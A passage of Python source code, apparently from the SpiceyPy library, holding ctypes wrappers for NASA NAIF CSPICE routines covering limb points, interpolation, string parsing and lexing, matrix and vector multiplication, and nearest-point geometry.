:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Aberration correction.
:type abcorr: str
:param corloc: Aberration correction locus.
:type corloc: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param refvec: Reference vector for cutting half-planes.
:type refvec: 3-Element Array of floats
:param rolstp: Roll angular step for cutting half-planes.
:type rolstp: float
:param ncuts: Number of cutting half-planes.
:type ncuts: int
:param schstp: Angular step size for searching.
:type schstp: float
:param soltol: Solution convergence tolerance.
:type soltol: float
:param maxn: Maximum number of entries in output arrays.
:type maxn: int
:return: Counts of limb points corresponding to cuts, Limb points, Times associated with limb points, Tangent vectors emanating from the observer
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
corloc = stypes.stringToCharP(corloc)
obsrvr = stypes.stringToCharP(obsrvr)
refvec = stypes.toDoubleVector(refvec)
rolstp = ctypes.c_double(rolstp)
ncuts = ctypes.c_int(ncuts)
schstp = ctypes.c_double(schstp)
soltol = ctypes.c_double(soltol)
maxn = ctypes.c_int(maxn)
npts = stypes.emptyIntVector(maxn.value)
points = stypes.emptyDoubleMatrix(3, maxn.value)
epochs = stypes.emptyDoubleVector(maxn)
tangts = stypes.emptyDoubleMatrix(3, maxn.value)
libspice.limbpt_c(method, target, et, fixref,
abcorr, corloc, obsrvr, refvec,
rolstp, ncuts, schstp, soltol,
maxn, npts, points, epochs, tangts)
# Clip the empty elements out of returned results
npts = stypes.cVectorToPython(npts)
valid_points = numpy.where(npts >= 1)
return npts[valid_points], stypes.cMatrixToNumpy(points)[valid_points], stypes.cVectorToPython(epochs)[valid_points], stypes.cMatrixToNumpy(tangts)[valid_points]
@spiceErrorCheck
def lgrind(xvals, yvals, x):
"""
Evaluate a Lagrange interpolating polynomial for a specified
set of coordinate pairs, at a specified abscissa value.
Return the value of both polynomial and derivative.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lgrind_c.html
:param xvals: Abscissa values.
:type xvals: N-Element Array of floats
:param yvals: Ordinate values.
:type yvals: N-Element Array of floats
:param x: Point at which to interpolate the polynomial.
:type x: float
:return: Polynomial value at x, Polynomial derivative at x.
:rtype: tuple
"""
n = ctypes.c_int(len(xvals))
xvals = stypes.toDoubleVector(xvals)
yvals = stypes.toDoubleVector(yvals)
work = stypes.emptyDoubleVector(n.value*2)
x = ctypes.c_double(x)
p = ctypes.c_double(0)
dp = ctypes.c_double(0)
libspice.lgrind_c(n, xvals, yvals, work, x, p, dp)
return p.value, dp.value
@spiceErrorCheck
def lmpool(cvals):
"""
Load the variables contained in an internal buffer into the
kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lmpool_c.html
:param cvals: list of strings.
:type cvals: list of str
"""
lenvals = ctypes.c_int(len(max(cvals, key=len)) + 1)
n = ctypes.c_int(len(cvals))
cvals = stypes.listToCharArrayPtr(cvals, xLen=lenvals, yLen=n)
libspice.lmpool_c(cvals, lenvals, n)
@spiceErrorCheck
def lparse(inlist, delim, nmax):
"""
Parse a list of items delimited by a single character.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lparse_c.html
:param inlist: list of items delimited by delim.
:type inlist: list
:param delim: Single character used to delimit items.
:type delim: str
:param nmax: Maximum number of items to return.
:type nmax: int
:return: Items in the list, left justified.
:rtype: list of str
"""
delim = stypes.stringToCharP(delim)
lenout = ctypes.c_int(len(inlist))
inlist = stypes.stringToCharP(inlist)
nmax = ctypes.c_int(nmax)
items = stypes.emptyCharArray(lenout, nmax)
n = ctypes.c_int()
libspice.lparse_c(inlist, delim, nmax, lenout, ctypes.byref(n),
ctypes.byref(items))
return [stypes.toPythonString(x.value) for x in items[0:n.value]]
@spiceErrorCheck
def lparsm(inlist, delims, nmax, lenout=None):
"""
Parse a list of items separated by multiple delimiters.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lparsm_c.html
:param inlist: list of items delimited by delims.
:type inlist: list of strings
:param delims: Single characters which delimit items.
:type delims: str
:param nmax: Maximum number of items to return.
:type nmax: int
:param lenout: Optional Length of strings in item array.
:type lenout: int
:return: Items in the list, left justified.
:rtype: list of strings
"""
if lenout is None:
lenout = ctypes.c_int(len(inlist) + 1)
else:
lenout = ctypes.c_int(lenout)
inlist = stypes.stringToCharP(inlist)
delims = stypes.stringToCharP(delims)
items = stypes.emptyCharArray(lenout.value, nmax)
nmax = ctypes.c_int(nmax)
n = ctypes.c_int()
libspice.lparsm_c(inlist, delims, nmax, lenout, ctypes.byref(n), items)
return [stypes.toPythonString(x.value) for x in items][0:n.value]
@spiceErrorCheck
def lparss(inlist, delims, NMAX=20, LENGTH=50):
"""
Parse a list of items separated by multiple delimiters, placing the
resulting items into a set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lparss_c.html
:param inlist: list of items delimited by delims.
:type inlist:
:param delims: Single characters which delimit items.
:type delims: str
:param NMAX: Optional nmax of spice set.
:type NMAX: int
:param LENGTH: Optional length of strings in spice set
:type LENGTH: int
:return: Set containing items in the list, left justified.
:rtype:
"""
inlist = stypes.stringToCharP(inlist)
delims = stypes.stringToCharP(delims)
returnSet = stypes.SPICECHAR_CELL(NMAX, LENGTH)
libspice.lparss_c(inlist, delims, ctypes.byref(returnSet))
return returnSet
@spiceErrorCheck
def lspcn(body, et, abcorr):
"""
Compute L_s, the planetocentric longitude of the sun, as seen
from a specified body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lspcn_c.html
:param body: Name of central body.
:type body: str
:param et: Epoch in seconds past J2000 TDB.
:type et: float
:param abcorr: Aberration correction.
:type abcorr: str
:return: planetocentric longitude of the sun
:rtype: float
"""
body = stypes.stringToCharP(body)
et = ctypes.c_double(et)
abcorr = stypes.stringToCharP(abcorr)
return libspice.lspcn_c(body, et, abcorr)
@spiceErrorCheck
def lstlec(string, n, lenvals, array):
"""
Given a character string and an ordered array of character
strings, find the index of the largest array element less than
or equal to the given string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlec_c.html
:param string: Upper bound value to search against.
:type string: str
:param n: Number elements in array.
:type n: int
:param lenvals: String length.
:type lenvals: int
:param array: Array of possible lower bounds.
:type array: list
:return:
index of the last element of array that is
lexically less than or equal to string.
:rtype: int
"""
string = stypes.stringToCharP(string)
array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=n)
n = ctypes.c_int(n)
lenvals = ctypes.c_int(lenvals)
return libspice.lstlec_c(string, n, lenvals, array)
@spiceErrorCheck
def lstled(x, n, array):
"""
Given a number x and an array of non-decreasing floats
find the index of the largest array element less than or equal to x.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstled_c.html
:param x: Value to search against.
:type x: float
:param n: Number elements in array.
:type n: int
:param array: Array of possible lower bounds
:type array: list
:return: index of the last element of array that is less than or equal to x.
:rtype: int
"""
array = stypes.toDoubleVector(array)
x = ctypes.c_double(x)
n = ctypes.c_int(n)
return libspice.lstled_c(x, n, array)
@spiceErrorCheck
def lstlei(x, n, array):
"""
Given a number x and an array of non-decreasing ints,
find the index of the largest array element less than or equal to x.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlei_c.html
:param x: Value to search against.
:type x: int
:param n: Number elements in array.
:type n: int
:param array: Array of possible lower bounds
:type array: list
:return: index of the last element of array that is less than or equal to x.
:rtype: int
"""
array = stypes.toIntVector(array)
x = ctypes.c_int(x)
n = ctypes.c_int(n)
return libspice.lstlei_c(x, n, array)
@spiceErrorCheck
def lstltc(string, n, lenvals, array):
"""
Given a character string and an ordered array of character
strings, find the index of the largest array element less than
the given string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstltc_c.html
:param string: Upper bound value to search against.
:type string: int
:param n: Number elements in array.
:type n: int
:param lenvals: String length.
:type lenvals: int
:param array: Array of possible lower bounds
:type array: list
:return:
index of the last element of array that
is lexically less than string.
:rtype: int
"""
string = stypes.stringToCharP(string)
array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=n)
n = ctypes.c_int(n)
lenvals = ctypes.c_int(lenvals)
return libspice.lstltc_c(string, n, lenvals, array)
@spiceErrorCheck
def lstltd(x, n, array):
"""
Given a number x and an array of non-decreasing floats
find the index of the largest array element less than x.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstltd_c.html
:param x: Value to search against
:type x: float
:param n: Number elements in array
:type n: int
:param array: Array of possible lower bounds
:type array: list
:return: index of the last element of array that is less than x.
:rtype: int
"""
array = stypes.toDoubleVector(array)
x = ctypes.c_double(x)
n = ctypes.c_int(n)
return libspice.lstltd_c(x, n, array)
@spiceErrorCheck
def lstlti(x, n, array):
"""
Given a number x and an array of non-decreasing int,
find the index of the largest array element less than x.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlti_c.html
:param x: Value to search against
:type x: int
:param n: Number elements in array
:type n: int
:param array: Array of possible lower bounds
:type array: list
:return: index of the last element of array that is less than x.
:rtype: int
"""
array = stypes.toIntVector(array)
x = ctypes.c_int(x)
n = ctypes.c_int(n)
return libspice.lstlti_c(x, n, array)
@spiceErrorCheck
def ltime(etobs, obs, direct, targ):
"""
This routine computes the transmit (or receive) time
of a signal at a specified target, given the receive
(or transmit) time at a specified observer. The elapsed
time between transmit and receive is also returned.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ltime_c.html
:param etobs: Epoch of a signal at some observer
:type etobs: float
:param obs: NAIF ID of some observer
:type obs: int
:param direct: Direction the signal travels ( "->" or "<-" )
:type direct: str
:param targ: NAIF ID of the target object
:type targ: int
:return: epoch and time
:rtype: tuple
"""
etobs = ctypes.c_double(etobs)
obs = ctypes.c_int(obs)
direct = stypes.stringToCharP(direct)
targ = ctypes.c_int(targ)
ettarg = ctypes.c_double()
elapsd = ctypes.c_double()
libspice.ltime_c(etobs, obs, direct, targ, ctypes.byref(ettarg),
ctypes.byref(elapsd))
return ettarg.value, elapsd.value
@spiceErrorCheck
def lx4dec(string, first):
"""
Scan a string from a specified starting position for the
end of a decimal number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4dec_c.html
:param string: Any character string.
:type string: str
:param first: First character to scan from in string.
:type first: int
:return: last and nchar
:rtype: tuple
"""
string = stypes.stringToCharP(string)
first = ctypes.c_int(first)
last = ctypes.c_int()
nchar = ctypes.c_int()
libspice.lx4dec_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
return last.value, nchar.value
@spiceErrorCheck
def lx4num(string, first):
"""
Scan a string from a specified starting position for the
end of a number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4num_c.html
:param string: Any character string.
:type string: str
:param first: First character to scan from in string.
:type first: int
:return: last and nchar
:rtype: tuple
"""
string = stypes.stringToCharP(string)
first = ctypes.c_int(first)
last = ctypes.c_int()
nchar = ctypes.c_int()
libspice.lx4num_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
return last.value, nchar.value
@spiceErrorCheck
def lx4sgn(string, first):
"""
Scan a string from a specified starting position for the
end of a signed integer.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4sgn_c.html
:param string: Any character string.
:type string: str
:param first: First character to scan from in string.
:type first: int
:return: last and nchar
:rtype: tuple
"""
string = stypes.stringToCharP(string)
first = ctypes.c_int(first)
last = ctypes.c_int()
nchar = ctypes.c_int()
libspice.lx4sgn_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
return last.value, nchar.value
@spiceErrorCheck
def lx4uns(string, first):
"""
Scan a string from a specified starting position for the
end of an unsigned integer.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4uns_c.html
:param string: Any character string.
:type string: str
:param first: First character to scan from in string.
:type first: int
:return: last and nchar
:rtype: tuple
"""
string = stypes.stringToCharP(string)
first = ctypes.c_int(first)
last = ctypes.c_int()
nchar = ctypes.c_int()
libspice.lx4uns_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
return last.value, nchar.value
@spiceErrorCheck
def lxqstr(string, qchar, first):
"""
Lex (scan) a quoted string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lxqstr_c.html
:param string: String to be scanned.
:type string: str
:param qchar: Quote delimiter character.
:type qchar: char (string of one char)
:param first: Character position at which to start scanning.
:type first: int
:return: last and nchar
:rtype: tuple
"""
string = stypes.stringToCharP(string)
qchar = ctypes.c_char(qchar.encode(encoding='UTF-8'))
first = ctypes.c_int(first)
last = ctypes.c_int()
nchar = ctypes.c_int()
libspice.lxqstr_c(string, qchar, first, ctypes.byref(last),
ctypes.byref(nchar))
return last.value, nchar.value
################################################################################
# M
@spiceErrorCheck
def m2eul(r, axis3, axis2, axis1):
"""
Factor a rotation matrix as a product of three rotations
about specified coordinate axes.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/m2eul_c.html
:param r: A rotation matrix to be factored
:type r: 3x3-Element Array of floats
:param axis3: third rotation axes.
:type axis3: int
:param axis2: second rotation axes.
:type axis2: int
:param axis1: first rotation axes.
:type axis1: int
:return: Third, second, and first Euler angles, in radians.
:rtype: tuple
"""
r = stypes.toDoubleMatrix(r)
axis3 = ctypes.c_int(axis3)
axis2 = ctypes.c_int(axis2)
axis1 = ctypes.c_int(axis1)
angle3 = ctypes.c_double()
angle2 = ctypes.c_double()
angle1 = ctypes.c_double()
libspice.m2eul_c(r, axis3, axis2, axis1, ctypes.byref(angle3),
ctypes.byref(angle2), ctypes.byref(angle1))
return angle3.value, angle2.value, angle1.value
@spiceErrorCheck
def m2q(r):
"""
Find a unit quaternion corresponding to a specified rotation matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/m2q_c.html
:param r: A rotation matrix to be factored
:type r: 3x3-Element Array of floats
:return: A unit quaternion representing the rotation matrix
:rtype: 4-Element Array of floats
"""
r = stypes.toDoubleMatrix(r)
q = stypes.emptyDoubleVector(4)
libspice.m2q_c(r, q)
return stypes.cVectorToPython(q)
@spiceErrorCheck
def matchi(string, templ, wstr, wchr):
"""
Determine whether a string is matched by a template containing wild cards.
The pattern comparison is case-insensitive.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/matchi_c.html
:param string: String to be tested.
:type string: str
:param templ: Template (with wild cards) to test against string.
:type templ: str
:param wstr: Wild string token.
:type wstr: str of length 1
:param wchr: Wild character token.
:type wchr: str of length 1
:return: The function returns True if string matches templ, else False
:rtype: bool
"""
string = stypes.stringToCharP(string)
templ = stypes.stringToCharP(templ)
wstr = ctypes.c_char(wstr.encode(encoding='UTF-8'))
wchr = ctypes.c_char(wchr.encode(encoding='UTF-8'))
return bool(libspice.matchi_c(string, templ, wstr, wchr))
@spiceErrorCheck
def matchw(string, templ, wstr, wchr):
# ctypes.c_char(wstr.encode(encoding='UTF-8')
"""
Determine whether a string is matched by a template containing wild cards.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/matchw_c.html
:param string: String to be tested.
:type string: str
:param templ: Template (with wild cards) to test against string.
:type templ: str
:param wstr: Wild string token.
:type wstr: str of length 1
:param wchr: Wild character token.
:type wchr: str of length 1
:return: The function returns True if string matches templ, else False
:rtype: bool
"""
string = stypes.stringToCharP(string)
templ = stypes.stringToCharP(templ)
wstr = ctypes.c_char(wstr.encode(encoding='UTF-8'))
wchr = ctypes.c_char(wchr.encode(encoding='UTF-8'))
return bool(libspice.matchw_c(string, templ, wstr, wchr))
# skiping for now maxd_c,
# odd as arguments must be parsed and not really important
# skiping for now maxi_c,
# odd as arguments must be parsed and not really important
@spiceErrorCheck
def mequ(m1):
"""
Set one double precision 3x3 matrix equal to another.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mequ_c.html
:param m1: input matrix.
:type m1: 3x3-Element Array of floats
:return: Output matrix equal to m1.
:rtype: 3x3-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
mout = stypes.emptyDoubleMatrix()
libspice.mequ_c(m1, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mequg(m1, nr, nc):
"""
Set one double precision matrix of arbitrary size equal to another.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mequg_c.html
:param m1: Input matrix.
:type m1: NxM-Element Array of floats
:param nr: Row dimension of m1.
:type nr: int
:param nc: Column dimension of m1.
:type nc: int
:return: Output matrix equal to m1
:rtype: NxM-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
mout = stypes.emptyDoubleMatrix(x=nc, y=nr)
nc = ctypes.c_int(nc)
nr = ctypes.c_int(nr)
libspice.mequg_c(m1, nc, nr, mout)
return stypes.cMatrixToNumpy(mout)
# skiping for now mind_c,
# odd as arguments must be parsed and not really important
# skiping for now mini_c,
# odd as arguments must be parsed and not really important
@spiceErrorCheck
def mtxm(m1, m2):
"""
Multiply the transpose of a 3x3 matrix and a 3x3 matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxm_c.html
:param m1: 3x3 double precision matrix.
:type m1: 3x3-Element Array of floats
:param m2: 3x3 double precision matrix.
:type m2: 3x3-Element Array of floats
:return: The produce m1 transpose times m2.
:rtype: 3x3-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
m2 = stypes.toDoubleMatrix(m2)
mout = stypes.emptyDoubleMatrix()
libspice.mtxm_c(m1, m2, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mtxmg(m1, m2, ncol1, nr1r2, ncol2):
"""
Multiply the transpose of a matrix with
another matrix, both of arbitrary size.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxmg_c.html
:param m1: nr1r2 X ncol1 double precision matrix.
:type m1: NxM-Element Array of floats
:param m2: nr1r2 X ncol2 double precision matrix.
:type m2: NxM-Element Array of floats
:param ncol1: Column dimension of m1 and row dimension of mout.
:type ncol1: int
:param nr1r2: Row dimension of m1 and m2.
:type nr1r2: int
:param ncol2: Column dimension of m2.
:type ncol2: int
:return: Transpose of m1 times m2.
:rtype: NxM-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
m2 = stypes.toDoubleMatrix(m2)
mout = stypes.emptyDoubleMatrix(x=ncol2, y=ncol1)
ncol1 = ctypes.c_int(ncol1)
nr1r2 = ctypes.c_int(nr1r2)
ncol2 = ctypes.c_int(ncol2)
libspice.mtxmg_c(m1, m2, ncol1, nr1r2, ncol2, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mtxv(m1, vin):
"""
Multiplies the transpose of a 3x3 matrix
on the left with a vector on the right.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxv_c.html
:param m1: 3x3 double precision matrix.
:type m1: 3x3-Element Array of floats
:param vin: 3-dimensional double precision vector.
:type vin: 3-Element Array of floats
:return: 3-dimensional double precision vector.
:rtype: 3-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
vin = stypes.toDoubleVector(vin)
vout = stypes.emptyDoubleVector(3)
libspice.mtxv_c(m1, vin, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def mtxvg(m1, v2, ncol1, nr1r2):
"""
Multiply the transpose of a matrix and
a vector of arbitrary size.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxvg_c.html
:param m1: Left-hand matrix to be multiplied.
:type m1: NxM-Element Array of floats
:param v2: Right-hand vector to be multiplied.
:type v2: Array of floats
:param ncol1: Column dimension of m1 and length of vout.
:type ncol1: int
:param nr1r2: Row dimension of m1 and length of v2.
:type nr1r2: int
:return: Product vector m1 transpose * v2.
:rtype: Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
v2 = stypes.toDoubleVector(v2)
ncol1 = ctypes.c_int(ncol1)
nr1r2 = ctypes.c_int(nr1r2)
vout = stypes.emptyDoubleVector(ncol1.value)
libspice.mtxvg_c(m1, v2, ncol1, nr1r2, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def mxm(m1, m2):
"""
Multiply two 3x3 matrices.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxm_c.html
:param m1: 3x3 double precision matrix.
:type m1: 3x3-Element Array of floats
:param m2: 3x3 double precision matrix.
:type m2: 3x3-Element Array of floats
:return: 3x3 double precision matrix.
:rtype: 3x3-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
m2 = stypes.toDoubleMatrix(m2)
mout = stypes.emptyDoubleMatrix()
libspice.mxm_c(m1, m2, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mxmg(m1, m2, nrow1, ncol1, ncol2):
"""
Multiply two double precision matrices of arbitrary size.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxmg_c.html
:param m1: nrow1 X ncol1 double precision matrix.
:type m1: NxM-Element Array of floats
:param m2: ncol1 X ncol2 double precision matrix.
:type m2: NxM-Element Array of floats
:param nrow1: Row dimension of m1
:type nrow1: int
:param ncol1: Column dimension of m1 and row dimension of m2.
:type ncol1: int
:param ncol2: Column dimension of m2
:type ncol2: int
:return: nrow1 X ncol2 double precision matrix.
:rtype: NxM-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
m2 = stypes.toDoubleMatrix(m2)
mout = stypes.emptyDoubleMatrix(x=ncol2, y=nrow1)
nrow1 = ctypes.c_int(nrow1)
ncol1 = ctypes.c_int(ncol1)
ncol2 = ctypes.c_int(ncol2)
libspice.mxmg_c(m1, m2, nrow1, ncol1, ncol2, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mxmt(m1, m2):
"""
Multiply a 3x3 matrix and the transpose of another 3x3 matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxmt_c.html
:param m1: 3x3 double precision matrix.
:type m1: 3x3-Element Array of floats
:param m2: 3x3 double precision matrix.
:type m2: 3x3-Element Array of floats
:return: The product m1 times m2 transpose.
:rtype: float
"""
m1 = stypes.toDoubleMatrix(m1)
m2 = stypes.toDoubleMatrix(m2)
mout = stypes.emptyDoubleMatrix()
libspice.mxmt_c(m1, m2, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mxmtg(m1, m2, nrow1, nc1c2, nrow2):
"""
Multiply a matrix and the transpose of a matrix, both of arbitrary size.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxmtg_c.html
:param m1: Left-hand matrix to be multiplied.
:type m1: NxM-Element Array of floats
:param m2: Right-hand matrix whose transpose is to be multiplied
:type m2: NxM-Element Array of floats
:param nrow1: Row dimension of m1 and row dimension of mout.
:type nrow1: int
:param nc1c2: Column dimension of m1 and column dimension of m2.
:type nc1c2: int
:param nrow2: Row dimension of m2 and column dimension of mout.
:type nrow2: int
:return: Product matrix.
:rtype: NxM-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
m2 = stypes.toDoubleMatrix(m2)
mout = stypes.emptyDoubleMatrix(x=nrow2, y=nrow1)
nrow1 = ctypes.c_int(nrow1)
nc1c2 = ctypes.c_int(nc1c2)
nrow2 = ctypes.c_int(nrow2)
libspice.mxmtg_c(m1, m2, nrow1, nc1c2, nrow2, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mxv(m1, vin):
"""
Multiply a 3x3 double precision matrix with a
3-dimensional double precision vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxv_c.html
:param m1: 3x3 double precision matrix.
:type m1: 3x3-Element Array of floats
:param vin: 3-dimensional double precision vector.
:type vin: 3-Element Array of floats
:return: 3-dimensional double precision vector.
:rtype: 3-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
vin = stypes.toDoubleVector(vin)
vout = stypes.emptyDoubleVector(3)
libspice.mxv_c(m1, vin, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def mxvg(m1, v2, nrow1, nc1r2):
"""
Multiply a matrix and a vector of arbitrary size.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxvg_c.html
:param m1: Left-hand matrix to be multiplied.
:type m1: NxM-Element Array of floats
:param v2: Right-hand vector to be multiplied.
:type v2: Array of floats
:param nrow1: Row dimension of m1 and length of vout.
:type nrow1: int
:param nc1r2: Column dimension of m1 and length of v2.
:type nc1r2: int
:return: Product vector m1*v2
:rtype: Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
v2 = stypes.toDoubleVector(v2)
nrow1 = ctypes.c_int(nrow1)
nc1r2 = ctypes.c_int(nc1r2)
vout = stypes.emptyDoubleVector(nrow1.value)
libspice.mxvg_c(m1, v2, nrow1, nc1r2, vout)
return stypes.cVectorToPython(vout)
################################################################################
# N
@spiceErrorCheck
def namfrm(frname):
"""
Look up the frame ID code associated with a string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/namfrm_c.html
:param frname: The name of some reference frame.
:type frname: str
:return: The SPICE ID code of the frame.
:rtype: int
"""
frname = stypes.stringToCharP(frname)
frcode = ctypes.c_int()
libspice.namfrm_c(frname, ctypes.byref(frcode))
return frcode.value
@spiceErrorCheck
def ncpos(string, chars, start):
"""
Find the first occurrence in a string of a character NOT belonging
to a collection of characters, starting at a specified
location searching forward.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ncpos_c.html
:param string: Any character string.
:type string: str
:param chars: A collection of characters.
:type chars: str
:param start: Position to begin looking for one not in chars.
:type start: int
:return: index
:rtype: int
"""
string = stypes.stringToCharP(string)
chars = stypes.stringToCharP(chars)
start = ctypes.c_int(start)
return libspice.ncpos_c(string, chars, start)
@spiceErrorCheck
def ncposr(string, chars, start):
"""
Find the first occurrence in a string of a character NOT belonging to a
collection of characters, starting at a specified location,
searching in reverse.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ncposr_c.html
:param string: Any character string.
:type string: str
:param chars: A collection of characters.
:type chars: str
:param start: Position to begin looking for one of chars.
:type start: int
:return: index
:rtype: int
"""
string = stypes.stringToCharP(string)
chars = stypes.stringToCharP(chars)
start = ctypes.c_int(start)
return libspice.ncposr_c(string, chars, start)
@spiceErrorCheck
def nearpt(positn, a, b, c):
"""
locates the point on the surface of an ellipsoid that is nearest to a
specified position. It also returns the altitude of the
position above the ellipsoid.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nearpt_c.html
:param positn: Position of a point in bodyfixed frame.
:type positn: 3-Element Array of floats
:param a: Length of semi-axis parallel to x-axis.
:type a: float
:param b: Length of semi-axis parallel to y-axis.
:type b: float
:param c: Length on semi-axis parallel to z-axis.
:type c: float
:return:
Point on the ellipsoid closest to positn,
Altitude of positn above the ellipsoid.
:rtype: tuple
"""
positn = stypes.toDoubleVector(positn)
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
npoint = stypes.emptyDoubleVector(3)
alt = ctypes.c_double()
libspice.nearpt_c(positn, a, b, c, npoint, ctypes.byref(alt))
return stypes.cVectorToPython(npoint), alt.value
@spiceErrorCheck
def npedln(a, b, c, linept, linedr):
"""
Find nearest point on a triaxial ellipsoid to a specified
line and the distance from the ellipsoid to the line.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/npedln_c.html
:param a: Length of ellipsoid's semi-axis in the x direction
:type a: float
:param b: Length of ellipsoid's semi-axis in the y direction
:type b: float
:param c: Length of ellipsoid's semi-axis in the z direction
:type c: float
:param linept: Length of ellipsoid's semi-axis in the z direction
:type linept: 3-Element Array of floats
:param linedr: Direction vector of line
:type linedr: 3-Element Array of floats
:return: Nearest point on ellipsoid to line, Distance of ellipsoid from line
:rtype: tuple
"""
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
linept = stypes.toDoubleVector(linept)
linedr = stypes.toDoubleVector(linedr)
pnear = stypes.emptyDoubleVector(3)
dist = ctypes.c_double()
libspice.npedln_c(a, b, c, linept, linedr, pnear, ctypes.byref(dist))
return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def npelpt(point, ellips):
"""
Find the nearest point on an ellipse to a specified point, both
in three-dimensional space, and find the distance between the
ellipse and the point.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/npelpt_c.html
:param point: Point whose distance to an ellipse is to be found.
:type point: 3-Element Array of floats
:param ellips: An ellipse.
:type ellips: spiceypy.utils.support_types.Ellipse
:return: Nearest point on ellipsoid to line, Distance of ellipsoid from line
:rtype: tuple
"""
assert (isinstance(ellips, stypes.Ellipse))
point = stypes.toDoubleVector(point)
pnear = stypes.emptyDoubleVector(3)
dist = ctypes.c_double()
libspice.npelpt_c(point, ctypes.byref(ellips), pnear, ctypes.byref(dist))
return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def nplnpt(linpt, lindir, point):
"""
Find the nearest point on a line to a specified point,
and find the distance between the two points.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nplnpt_c.html
:param linpt: Point on a line
:type linpt: 3-Element Array of floats
:param lindir: line's direction vector
:type lindir: 3-Element Array of floats
:param point: A second point.
:type point: 3-Element Array of floats
:return:
Nearest point on the line to point,
Distance between point and pnear
:rtype: tuple
"""
linpt = stypes.toDoubleVector(linpt)
lindir = stypes.toDoubleVector(lindir)
point = stypes.toDoubleVector(point)
pnear = stypes.emptyDoubleVector(3)
